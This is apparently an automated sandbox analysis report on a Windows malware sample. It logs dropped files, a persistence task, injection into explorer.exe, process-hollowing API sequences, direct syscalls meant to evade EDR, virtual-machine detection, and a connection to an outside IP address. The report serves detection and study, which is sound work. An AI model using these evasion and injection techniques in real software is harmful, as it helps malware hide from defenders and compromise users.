Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: svrapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: shunimpl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Static file information: File size 13599640 > 1048576

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x50de00
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1f3e00

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Static PE information: More than 200 imports for user32.dll

Source:	Binary string: iassvcs.pdb source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000D.00000002.1719883725.0000000000982000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788041968.0000000000242000.00000008.00000001.01000000.00000000.sdmp, cckrnaa.10.dr, pbxllkvlhugf.8.dr, djivmxg.2.dr
Source:	Binary string: wntdll.pdbUGP source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.00000000065F5000.00000004.00000020.00020000.00000000.sdmp, BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649593954.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649842763.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719035494.0000000004A8C000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719531853.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1786914939.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787138417.0000000004570000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602423452.0000000005040000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602042227.0000000004BAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720201223.0000000004EB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720318364.0000000005210000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788501431.0000000005400000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788275557.0000000004F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1384464950.00000000065F5000.00000004.00000020.00020000.00000000.sdmp, BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1389532302.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649593954.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649842763.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719035494.0000000004A8C000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719531853.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1786914939.00000000040CD000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787138417.0000000004570000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602423452.0000000005040000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602042227.0000000004BAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720201223.0000000004EB2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720318364.0000000005210000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788501431.0000000005400000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788275557.0000000004F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iassvcs.pdbGCTL source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000D.00000002.1719883725.0000000000982000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788041968.0000000000242000.00000008.00000001.01000000.00000000.sdmp, cckrnaa.10.dr, pbxllkvlhugf.8.dr, djivmxg.2.dr

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Static PE information: section name: .didata
Source: djivmxg.2.dr	Static PE information: section name: hla
Source: pbxllkvlhugf.8.dr	Static PE information: section name: hla
Source: cckrnaa.10.dr	Static PE information: section name: hla

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F09FB1 push ecx; ret

12_2_02F09FC4

Source: C:\Windows\SysWOW64\comp.exe	File created: C:\Users\user\AppData\Local\Temp\cckrnaa	Jump to dropped file
Source: C:\Windows\SysWOW64\comp.exe	File created: C:\Users\user\AppData\Local\Temp\djivmxg	Jump to dropped file
Source: C:\Windows\SysWOW64\comp.exe	File created: C:\Users\user\AppData\Local\Temp\pbxllkvlhugf	Jump to dropped file

Source: C:\Windows\SysWOW64\comp.exe	File created: C:\Users\user\AppData\Local\Temp\djivmxg	Jump to dropped file
Source: C:\Windows\SysWOW64\comp.exe	File created: C:\Users\user\AppData\Local\Temp\pbxllkvlhugf	Jump to dropped file
Source: C:\Windows\SysWOW64\comp.exe	File created: C:\Users\user\AppData\Local\Temp\cckrnaa	Jump to dropped file

Source: C:\Windows\SysWOW64\comp.exe

File created: C:\Windows\Tasks\ServiceHub Controller.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\comp.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DJIVMXG
Source: C:\Windows\SysWOW64\comp.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PBXLLKVLHUGF
Source: C:\Windows\SysWOW64\comp.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CCKRNAA

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F090DD GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

12_2_02F090DD

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	API/Special instruction interceptor: Address: 6CDB7C44
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	API/Special instruction interceptor: Address: 6CDB7945
Source: C:\Windows\SysWOW64\comp.exe	API/Special instruction interceptor: Address: 6CDB3B54
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	API/Special instruction interceptor: Address: 6CDB7C44
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	API/Special instruction interceptor: Address: 6CDB7945
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: B7A317

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F57E2D rdtsc

12_2_02F57E2D

Source: C:\Windows\SysWOW64\explorer.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3672			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 5915			Jump to behavior

Source: C:\Windows\SysWOW64\comp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cckrnaa	Jump to dropped file
Source: C:\Windows\SysWOW64\comp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\djivmxg	Jump to dropped file
Source: C:\Windows\SysWOW64\comp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pbxllkvlhugf	Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe TID: 2968	Thread sleep count: 3672 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2968	Thread sleep time: -110160000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2788	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2968	Thread sleep count: 5915 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2968	Thread sleep time: -177450000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F1ED13 FindFirstFileExW,

12_2_02F1ED13

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02EE93D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,

12_2_02EE93D0

Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	File opened: C:\Users\user	Jump to behavior

Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F57E2D rdtsc

12_2_02F57E2D

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F0A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_02F0A195

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Code function: 0_2_00632BED mov eax, dword ptr fs:[00000030h]	0_2_00632BED
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F0DB50 mov eax, dword ptr fs:[00000030h]	12_2_02F0DB50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F57E2D mov eax, dword ptr fs:[00000030h]	12_2_02F57E2D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F15D42 mov eax, dword ptr fs:[00000030h]	12_2_02F15D42

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F20294 GetProcessHeap,

12_2_02F20294

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F0A2F8 SetUnhandledExceptionFilter,	12_2_02F0A2F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F0A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_02F0A195
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F0E87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_02F0E87C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_02F098A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_02F098A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 172.67.213.173 80

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02EE8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

12_2_02EE8070

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	NtProtectVirtualMemory: Direct from: 0x6CD3D3F3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	NtProtectVirtualMemory: Direct from: 0x6CF52A6A	Jump to behavior
Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	NtSetInformationThread: Direct from: 0x63388E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	NtQuerySystemInformation: Direct from: 0x8B63F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	NtProtectVirtualMemory: Direct from: 0x6CF52AFF	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\comp.exe	Memory written: PID: 316 base: B779C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: PID: 316 base: 907008 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: PID: 2012 base: B779C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: PID: 2012 base: 319D008 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: PID: 4108 base: B779C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: PID: 4108 base: 3144008 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: read write	Jump to behavior
